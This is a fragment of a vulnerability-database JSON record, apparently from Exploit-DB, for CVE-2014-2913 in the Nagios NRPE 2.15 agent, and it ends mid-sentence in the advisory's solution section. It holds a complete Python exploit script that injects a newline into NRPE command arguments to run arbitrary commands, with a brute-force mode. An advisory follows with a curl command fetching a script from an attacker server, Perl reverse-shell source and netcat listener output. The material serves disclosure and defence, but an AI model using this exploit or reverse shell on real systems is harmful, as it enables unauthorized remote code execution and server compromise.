"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T21:15:19", "bulletinFamily": "exploit", "description": "NRPE 2.15 - Remote Code Execution Vulnerability. CVE-2014-2913. Remote exploits for multiple platform", "modified": "2014-08-29T00:00:00", "published": "2014-08-29T00:00:00", "id": "EDB-ID:34461", "href": "https://www.exploit-db.com/exploits/34461/", "type": "exploitdb", "title": "NRPE 2.15 - Remote Code Execution Vulnerability", "sourceData": "#!/usr/bin/python\r\n#\r\n#\r\n# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability\r\n#\r\n# Discovered by : Dawid Golunski\r\n# dawid (at) legalhackers (dot) com\r\n# legalhackers.com\r\n#\r\n# Exploit Author : Claudio Viviani\r\n# http://www.homelab.it\r\n#\r\n# info@homelab.it\r\n# homelabit@protonmail.ch\r\n#\r\n# https://www.facebook.com/homelabit\r\n# https://twitter.com/homelabit\r\n# https://plus.google.com/+HomelabIt1/\r\n# https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n#\r\n#\r\n#\r\n# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>\r\n# http://www.abcompcons.com/files/nrpe_client.py\r\n#\r\n# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)\r\n#\r\n# [root@localhost ~]# pip-python install pyOpenSSL\r\n#\r\n# NRPE <= 2.15 Remote Command Execution Vulnerability\r\n# Release date: 17.04.2014\r\n# Discovered by: Dawid Golunski\r\n# Severity: High\r\n# CVE-2014-2913\r\n#\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913\r\n# http://www.exploit-db.com/exploits/32925/\r\n# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)\r\n#\r\n# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x\r\n#\r\n# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE\r\n#\r\n\r\nimport OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/\r\nimport optparse\r\nimport os\r\nimport signal\r\nimport socket\r\nimport struct\r\nimport sys\r\nimport time\r\n\r\nbanner = \"\"\"\r\n\r\n$$\\ $$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$\\ $$\\ $$$$$$$\\\\\r\n$$$\\ $$ |$$ __$$\\ $$ __$$\\ $$ _____| $$ __$$\\ $$$$ | $$ ____|\r\n$$$$\\ $$ |$$ | $$ |$$ | $$ |$$ | \\__/ $$ | \\_$$ | $$ |\r\n$$ $$\\$$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$ | $$ | $$$$$$$\\\\\r\n$$ \\$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \\_____$$\\\\\r\n$$ |\\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\\ $$ |\r\n$$ | \\$$ |$$ | $$ |$$ | $$$$$$$$\\ $$$$$$$$\\ $$\\ $$$$$$\\\\$$$$$$ |\r\n\\__| \\__|\\__| \\__|\\__| \\________| \\________|\\__|\\______|\\______/\r\n\r\n\r\n\r\n $$$$$$$\\ $$$$$$\\ $$$$$$$$\\\\\r\n $$ __$$\\ $$ __$$\\ $$ _____|\r\n $$ | $$ |$$ / \\__|$$ |\r\n $$$$$$$ |$$ | $$$$$\\\\\r\n $$ __$$< $$ | $$ __|\r\n $$ | $$ |$$ | $$\\ $$ |\r\n $$ | $$ |\\$$$$$$ |$$$$$$$$\\\\\r\n \\__| \\__| \\______/ \\________|\r\n NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n\r\n\r\n\r\n =============================================\r\n - Release date: 17.04.2014\r\n - Discovered by: Dawid Golunski\r\n - Severity: High\r\n - CVE: 2014-2913\r\n =============================================\r\n\r\n Written by:\r\n\r\n Claudio Viviani\r\n\r\n http://www.homelab.it\r\n\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\r\n\"\"\"\r\n# Plugin list for Brute force mode\r\nPluginList = ['check_all',\r\n 'check_apt',\r\n 'check_bdii',\r\n 'check_bonding',\r\n 'check_breeze',\r\n 'check_by_ssh',\r\n 'check_check-updates',\r\n 'check_check_sip',\r\n 'check_cluster',\r\n 'check_dhcp',\r\n 'check_dig',\r\n 'check_disk',\r\n 'check_disk_smb',\r\n 'check_dns',\r\n 'check_dpm-disk',\r\n 'check_dpm-head',\r\n 'check_dummy',\r\n 'check_file_age',\r\n 'check_flexlm',\r\n 'check_fping',\r\n 'check_game',\r\n 'check_hpjd',\r\n 'check_http',\r\n 'check_icmp',\r\n 'check_ide_smart',\r\n 'check_ifoperstatus',\r\n 'check_ifstatus',\r\n 'check_ircd',\r\n 'check_lcgdm',\r\n 'check_lcgdm-common',\r\n 'check_ldap',\r\n 'check_lfc',\r\n 'check_linux_raid',\r\n 'check_load',\r\n 'check_log',\r\n 'check_mailq',\r\n 'check_mrtg',\r\n 'check_mrtgtraf',\r\n 'check_mysql',\r\n 'check_nagios',\r\n 'check_nrpe',\r\n 'check_nt',\r\n 'check_ntp',\r\n 'check_nwstat',\r\n 'check_openmanage',\r\n 'check_oracle',\r\n 'check_overcr',\r\n 'check_perl',\r\n 'check_pgsql',\r\n 'check_ping',\r\n 'check_procs',\r\n 'check_radius',\r\n 'check_real',\r\n 'check_rhev',\r\n 'check_rpc',\r\n 'check_sensors',\r\n 'check_smtp',\r\n 'check_snmp',\r\n 'check_ssh',\r\n 'check_swap',\r\n 'check_tcp',\r\n 'check_time',\r\n 'check_ups',\r\n 'check_users',\r\n 'check_wave']\r\n\r\n\r\n\r\n# nrpe 2.15 skip chars \"|`&><'\\\"\\\\[]{};\" and \"$()\" but not \"\\x0a\"(new line)\r\nevilchar = \"\\x0a\"\r\n\r\nQUERY_PACKET = 1\r\nRESPONSE_PACKET = 2\r\n\r\nNRPE_PACKET_VERSION_2 = 2\r\n\r\n# max amount of data we'll send in one query/response\r\nMAX_PACKETBUFFER_LENGTH = 1024\r\n\r\n\r\n#def debug(sMessage):\r\n# \"\"\"Send a string to STDERR\"\"\"\r\n# if DEBUG:\r\n# sys.stderr.write(\"%s\\n\" % sMessage)\r\n\r\nclass DataPacket:\r\n \"\"\"A Python implementation of the C struct, packet.\"\"\"\r\n def __init__(self, packet_version, packet_type):\r\n self.nPacketVersion = packet_version # int16\r\n self.nPacketType = packet_type # int16\r\n self.nCRC32 = 0 # u_int32\r\n self.nResultCode = 2324 # int16\r\n self.sData = ''\r\n self.tCRC32 = (\r\n 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,\r\n 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,\r\n 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,\r\n 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,\r\n 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,\r\n 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,\r\n 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,\r\n 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,\r\n 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,\r\n 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,\r\n 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,\r\n 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,\r\n 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,\r\n 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,\r\n 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,\r\n 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,\r\n 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,\r\n 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,\r\n 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,\r\n 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,\r\n 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,\r\n 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,\r\n 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,\r\n 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,\r\n 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,\r\n 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,\r\n 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,\r\n 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,\r\n 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,\r\n 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,\r\n 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,\r\n 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,\r\n 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,\r\n 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,\r\n 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,\r\n 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,\r\n 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,\r\n 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,\r\n 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,\r\n 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,\r\n 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,\r\n 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,\r\n 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,\r\n 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,\r\n 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,\r\n 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,\r\n 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,\r\n 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,\r\n 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,\r\n 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,\r\n 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,\r\n 0x2d02ef8d)\r\n\r\n def __str__(self):\r\n # Turn whatever string data we have into a null terminated string\r\n if len(self.sData) < MAX_PACKETBUFFER_LENGTH:\r\n sData = self.sData + \"\\0\" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))\r\n sData += \"SR\" # not sure about this, from perl\r\n elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:\r\n sData = self.sData\r\n else:\r\n raise ValueError(\"CHECK_NRPE: invalid input\")\r\n # Return a string that equals the C struct, not something printable\r\n return struct.pack(\"!hhLh\" + str(len(sData)) + \"s\", self.nPacketVersion,\r\n self.nPacketType, self.nCRC32, self.nResultCode, sData)\r\n\r\n def __len__(self):\r\n return len(self.__str__())\r\n\r\n def dumpself(self):\r\n \"\"\"Debugging output for self as C structure.\r\n\r\n Not normally used.\"\"\"\r\n sElf = self.__str__()\r\n sPrev = sElf[0:1]\r\n nCount = 0\r\n ii = -1\r\n for sChar in sElf[1:]:\r\n ii += 1\r\n if sChar == sPrev:\r\n nCount += 1\r\n continue\r\n if nCount:\r\n print \"%d\\t%d *\" % (ii - nCount, nCount + 1),\r\n nCount = 0\r\n else:\r\n print \"%d\\t\" % ii,\r\n print \"\\t'%s' (%d)\" % (sPrev, ord(sPrev))\r\n sPrev = sChar\r\n print \"%d\\t\\t'%s' (%d)\" % (ii + 1, sPrev, ord(sPrev))\r\n\r\n def calculate_crc32(self):\r\n \"\"\"Calculate the CRC32 value for the string version of self.\"\"\"\r\n nCRC = 0xFFFFFFFF\r\n for ii in self.__str__():\r\n nIndex = (nCRC ^ ord(ii)) & 0xFF\r\n nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]\r\n self.nCRC32 = nCRC ^ 0xFFFFFFFF\r\n #debug(\"DataPacket.calculate_crc32 = %d\" % self.nCRC32)\r\n\r\n def extract(self, sQuery):\r\n \"\"\"Turn a string into the DataPacket attributes.\"\"\"\r\n #debug(\"DataPacket.extract(%d)\" % len(sQuery))\r\n tVals = struct.unpack(\"!hhLh\" + str(len(sQuery) - 10) + \"s\", sQuery)\r\n self.nPacketVersion = tVals[0]\r\n self.nPacketType = tVals[1]\r\n self.nCRC32 = tVals[2]\r\n self.nResultCode = tVals[3]\r\n self.sData = tVals[4]\r\n\r\nm_nTimeout = 0\r\ndef alarm_handler(nSignum, oFrame):\r\n \"\"\"Timeout catcher\"\"\"\r\n raise KeyboardInterrupt(\"CHECK_NRPE: Socket timeout after %d seconds.\" %\r\n m_nTimeout)\r\n\r\n\r\nclass NrpeClient(DataPacket):\r\n \"\"\"Everything needed to send a message to an NRPE server and get data back.\r\n \"\"\"\r\n def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,\r\n packet_version=NRPE_PACKET_VERSION_2):\r\n DataPacket.__init__(self, packet_version, QUERY_PACKET)\r\n self.sServer = server_name\r\n self.nPort = server_port\r\n self.bUseSSL = use_ssl\r\n self.nTimeout = timeout\r\n\r\n def run_query(self, sQuery):\r\n \"\"\"Connect to the NRPE server, send the query and get back data.\r\n \"\"\"\r\n # initialize alarm signal handling and set timeout\r\n signal.signal(signal.SIGALRM, alarm_handler)\r\n signal.alarm(self.nTimeout)\r\n\r\n # try to connect to the host at the given port number\r\n oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # do SSL handshake\r\n if self.bUseSSL:\r\n oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)\r\n oContext.set_cipher_list('ADH')\r\n oConnection = OpenSSL.SSL.Connection(oContext, oSocket)\r\n else:\r\n oConnection = oSocket\r\n\r\n oConnection.connect((self.sServer, self.nPort))\r\n\r\n # we're connected and ready to go\r\n self.sData = sQuery\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n\r\n # send the packet\r\n oConnection.send(str(self))\r\n\r\n # wait for the response packet\r\n sRval = oConnection.recv(len(self))\r\n\r\n # close the connection\r\n if self.bUseSSL and not oConnection.shutdown():\r\n try:\r\n sRval += oConnection.recv(len(self))\r\n except OpenSSL.SSL.ZeroReturnError:\r\n pass\r\n oSocket.close()\r\n del oSocket, oConnection\r\n if self.bUseSSL:\r\n del oContext\r\n\r\n # reset timeout\r\n signal.alarm(0)\r\n\r\n if len(sRval) == 0:\r\n raise IOError(\"CHECK_NRPE: Received 0 bytes from daemon.\" +\r\n \"Check the remote server logs for error messages.\")\r\n elif len(sRval) < len(self):\r\n raise IOError(\"CHECK_NRPE: Receive underflow - only \" +\r\n \"%d bytes received (%d expected).\" % (len(sRval), len(self)))\r\n\r\n # Become the received data\r\n self.extract(sRval)\r\n\r\n # check the crc 32 value\r\n nRvalCRC = self.nCRC32\r\n self.nCRC32 = 0\r\n self.calculate_crc32()\r\n if nRvalCRC != self.nCRC32:\r\n raise ValueError(\"CHECK_NRPE: Response packet had invalid CRC32.\")\r\n\r\n # check packet version\r\n if self.nPacketVersion != NRPE_PACKET_VERSION_2:\r\n raise ValueError(\"CHECK_NRPE: Invalid packet version received from server.\")\r\n\r\n # check packet type\r\n if self.nPacketType != RESPONSE_PACKET:\r\n raise ValueError(\"CHECK_NRPE: Invalid packet type received from server.\")\r\n\r\n # Turn the input data into a proper python string (chop at first NULL)\r\n for ii in range(len(self.sData)):\r\n if self.sData[ii] == \"\\0\":\r\n break\r\n self.sData = self.sData[0:ii]\r\n\r\n\r\nif __name__ == '__main__':\r\n m_oOpts = optparse.OptionParser(\"%prog -H Host_or_IP -c nrpe_command --cmd=\\\"command to execute\\\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]\")\r\n m_oOpts.add_option('--host', '-H', action='store', type='string',\r\n help='The address of the host running the NRPE daemon (required)')\r\n m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,\r\n help='Do no use SSL')\r\n m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,\r\n help='The port on which the daemon is running (default=5666)')\r\n m_oOpts.add_option('--timeout', '-t', action='store', type='int',\r\n default=10,\r\n help='Number of seconds before connection times out (default=10)')\r\n m_oOpts.add_option('--command', '-c', action='store', type='string',\r\n #default='get_data',\r\n help='The name of nrpe command')\r\n m_oOpts.add_option('--brute', '-b', action='store_true', default=False,\r\n help='Find existing nrpe command from list [ -list ]')\r\n m_oOpts.add_option('--list', action='store_true', default=False,\r\n help='Show NRPE Command list')\r\n m_oOpts.add_option('--cmd', action='store', type='string',\r\n help='Command to execute on the remote server')\r\n\r\n m_oOptions, m_lArgs = m_oOpts.parse_args()\r\n m_nTimeout = m_oOptions.timeout\r\n m_sQuery = m_oOptions.command\r\n m_gList = m_oOptions.list\r\n m_sBrute = m_oOptions.brute\r\n\r\n print (banner)\r\n\r\n if m_gList:\r\n print('[+] NRPE Command list\\n')\r\n for LinesPluginList in PluginList:\r\n print(LinesPluginList)\r\n sys.exit(0)\r\n elif m_sQuery and m_sBrute:\r\n print m_oOpts.format_help()\r\n print('[!]')\r\n print('[!] ERROR: Select only -c OR -b option\\n')\r\n sys.exit(0)\r\n elif not m_oOptions.host or not m_oOptions.cmd:\r\n print m_oOpts.format_help()\r\n sys.exit(0)\r\n\r\n print('[+] Target: '+m_oOptions.host)\r\n print('[+] Command: '+m_oOptions.cmd+' \\n')\r\n\r\n if m_sBrute:\r\n print('[+] Brute force Mode....')\r\n print('[+]')\r\n for LinesPluginList in PluginList:\r\n\r\n m_CommandQuery = \"\"\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n\r\n m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n\r\n\r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n\r\n if m_oNRPE.sData[-11:] == \"not defined\":\r\n print('[-] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tnot found')\r\n else:\r\n print('[+] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tVULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\r\n elif m_sQuery:\r\n print('[+] Custom command Mode....')\r\n print('[+]')\r\n print('[+] Connecting......')\r\n\r\n m_CommandQuery = \"\"\r\n m_CommandQuery += ' ' + m_oOptions.cmd\r\n if m_lArgs:\r\n m_CommandQuery += ' ' + ' '.join(m_lArgs)\r\n\r\n m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'\r\n\r\n m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,\r\n m_oOptions.timeout)\r\n try:\r\n m_oNRPE.run_query(m_sQuery)\r\n except KeyboardInterrupt:\r\n print(\"[!] CHECK_NRPE: Socket timeout after %d seconds.\" % m_nTimeout)\r\n sys.exit(1)\r\n except socket.error:\r\n print('[!] Connection Error!')\r\n sys.exit(1)\r\n except OpenSSL.SSL.ZeroReturnError:\r\n print('[!] Not Vulnerable')\r\n print('[!] Option dont_blame_nrpe disabled or service fixed')\r\n sys.exit(1)\r\n\r\n if m_oNRPE.sData[-11:] == \"not defined\":\r\n print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')\r\n else:\r\n print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')\r\n print('[+]')\r\n print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')\r\n print('[+]')\r\n print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')\r\n print('[+]')\r\n print(m_oNRPE.sData)\r\n sys.exit(0)\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34461/"}, {"lastseen": "2016-02-03T18:06:01", "bulletinFamily": "exploit", "description": "NRPE <= 2.15 - Remote Command Execution. CVE-2014-2913. Remote exploits for multiple platform", "modified": "2014-04-18T00:00:00", "published": "2014-04-18T00:00:00", "id": "EDB-ID:32925", "href": "https://www.exploit-db.com/exploits/32925/", "type": "exploitdb", "title": "NRPE <= 2.15 - Remote Command Execution", "sourceData": "=============================================\r\n- Release date: 17.04.2014\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n=============================================\r\n\r\n \r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nNRPE - Nagios Remote Plugin Executor <= 2.15 Remote Command Execution\r\n\r\n \r\nII. BACKGROUND\r\n-------------------------\r\n\r\nNagios is an open source computer system monitoring, network monitoring and \r\ninfrastructure monitoring software application. Nagios offers monitoring and\r\nalerting services for servers, switches, applications, and services. \r\nIt alerts the users when things go wrong and alerts them a second time when\r\nthe problem has been resolved.\r\n\r\nThe NRPE (Nagios Remote Plugin Executor) addon is designed to allow you to \r\nexecute Nagios plugins on remote Linux/Unix machines.\r\nThe main reason for doing this is to allow Nagios to monitor \"local\" resources \r\n(like CPU load, memory usage, etc.) on remote machines. Since these public \r\nresources are not usually exposed to external machines, an agent like NRPE must\r\nbe installed on the remote Linux/Unix machines.\r\n\r\n\r\n \r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nNagios Remote Plugin Executor (NRPE) contains a vulnerability that could \r\nallow an attacker to remotely inject and execute arbitrary code on the host \r\nunder NRPE account (typically 'nagios'). \r\nThe vulnerability is due to NRPE not properly sanitizing user input before \r\npassing it to a command shell as a part of a configured command. \r\nIn order for an attacker to take advantage of the host NRPE must be compiled\r\nand configured with command arguments.\r\nNo authentication is required to exploit this vulnerability if the NRPE port \r\nhas not been protected with a firewall. \r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n \r\n\r\nNRPE expects definitions of commands in nrpe.cfg config file. Some of the \r\nexamples given in the config with hardcoded arguments are:\r\n\r\ncommand[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10\r\ncommand[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20\r\ncommand[check_hda1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /dev/hda1\r\n\r\nwhen command arguments are enabled then user is also allowed to define \r\ncommands with variables like:\r\n\r\ncommand[check_users]=/usr/local/nagios/libexec/check_users -w $ARG1$ -c $ARG2$\r\ncommand[check_disk]=/usr/local/nagios/libexec/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$\r\n\r\nThis is often suggested for convenience in various nagios/nrpe setup tutorials\r\non the web.\r\n\r\n\r\nTo get a result from a defined command in NRPE daemon the following nrpe client\r\ncan be used with -a option that passes arguments:\r\n\r\n# /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a 4 4\r\n\r\nUSERS OK - 4 users currently logged in |users=4;4;4;0\r\n\r\n\r\nin case check_users command was defined with arguments as shown above \r\nNRPE would execute:\r\n\r\n/usr/local/nagios/libexec/check_users -w 4 -c 4\r\n\r\non the local system.\r\n\r\n\r\nAs we can find in the source code of nrpe-2.15/src/nrpe.c NRPE daemon uses popen() function for\r\ncommand execution:\r\n\r\n/* executes a system command via popen(), but protects against timeouts */\r\nint my_system(char *command,int timeout,int *early_timeout,char *output,int output_length){\r\n----cut----\r\n /* run the command */\r\n fp=popen(command,\"r\");\r\n\r\n\r\nusing popen() results in the command being executed with the help of a command shell. \r\n\r\nBefore this function is reached however NRPE takes several measures to prevent \r\nmalicious command injection to the shell. That includes filtration based on a blacklist:\r\n\r\n#define NASTY_METACHARS \"|`&><'\\\"\\\\[]{};\"\r\n\r\n/* make sure request doesn't contain nasties */\r\nif(contains_nasty_metachars(pkt->buffer)==TRUE){\r\n\tsyslog(LOG_ERR,\"Error: Request contained illegal metachars!\");\r\n\r\nthat prevents bash special characters like semicolon, pipe etc. \r\n\r\nThe code is also making sure that arguments do not contain bash command substitution \r\ni.e. $(ps aux)\r\n\r\nif(strstr(macro_argv[x],\"$(\")) {\r\n\tsyslog(LOG_ERR,\"Error: Request contained a bash command substitution!\");\r\n\treturn ERROR;\r\n\r\n\r\nDespite these checks the code is vulnerable to command injection as bash shell allows\r\nfor multiple command execution if commands are separated by a new line. \r\nNone of the checks examines the arguments for an occurrence of a new line character: 0x0A\r\n\r\n \r\nV. PROOF OF CONCEPT\r\n-------------------------\r\n \r\nTo execute an arbitrary command an attacker could simply add a new line character after\r\na parameter and follow it with his own command.\r\n\r\nTo run touch /tmp/vulntest command an attacker could use the check_nrpe client with arguments:\r\n\r\n# /usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a \"`echo -e \"\\x0a touch /tmp/vulntest \"` #\" 4\r\n\r\nwhich make NRPE daemon run the following series of commands:\r\n\r\n/usr/local/nagios/libexec/check_users -w <new_line>\r\ntouch /tmp/vulntest\r\n# -c 4\r\n\r\nand a file /tmp/vulntest would be created with nagios user as the owner. The hash character is to comment\r\nout the the rest of the arguments.\r\n\r\n\r\nAn attacker gets a limited set of commands as most of the metacharacters are prohibited by the \r\nblacklist. So for example it's difficult to create new files in the system without using > symbol etc.\r\n\r\nAn attacker could however download a snippet of perl/python etc. code from the web by using wget or\r\ncurl command and get a reverse shell. This would allow unrestricted access to the command line:\r\n\r\n---------[revshell.pl on attackers-server]---------\r\n\r\n#!/usr/bin/perl\r\n\r\nuse Socket;\r\n\r\n#attackers ip to connect back to\r\n$i=\"10.10.10.40\";\r\n\r\n$p=8080;\r\n\r\nsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));\r\n\r\nif(connect(S,sockaddr_in($p,inet_aton($i))))\r\n\r\n{\r\n\topen(STDIN,\">&S\");\r\n\topen(STDOUT,\">&S\");\r\n\topen(STDERR,\">&S\");\r\n\texec(\"/bin/sh -i\");\r\n}\r\n--------------------------------------------------\r\n\r\n/usr/local/nagios/libexec/check_nrpe -H 10.10.10.5 -c check_users -a \"`echo -e \"\\x0a curl -o /tmp/tmp_revshell http://attackers-server/revshell.pl \\x0a perl /tmp/tmp_revshell # \"` 4 \"\r\n\r\n\r\n\r\n[attacker@10.10.10.40 ]# nc -v -l 8080\r\nConnection from 10.10.10.5 port 8080 [tcp/ddi-tcp-1] accepted\r\nsh-4.1$ id\r\nuid=501(nagios) gid=501(nagios) groups=501(nagios),502(nagcmd)\r\nsh-4.1$\r\nsh-4.1$ cat /etc/passwd | head -n 4 ; pwd\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\n/\r\nsh-4.1$ ls -l /tmp/tmp_revshell\r\n-rw-rw-r-- 1 nagios nagios 269 Apr 17 05:14 /tmp/tmp_revshell\r\nsh-4.1$ rm -f /tmp/tmp_revshell\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAn attacker could exploit the vulnerability to gain access to the system\r\nin the context of a nagios user this could lead to further compromise\r\nof the server.\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nCurrent version of NRPE 2.15 and older are vulnerable.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDisable command arguments if possible.\r\nProtect access to NRPE port and only allow 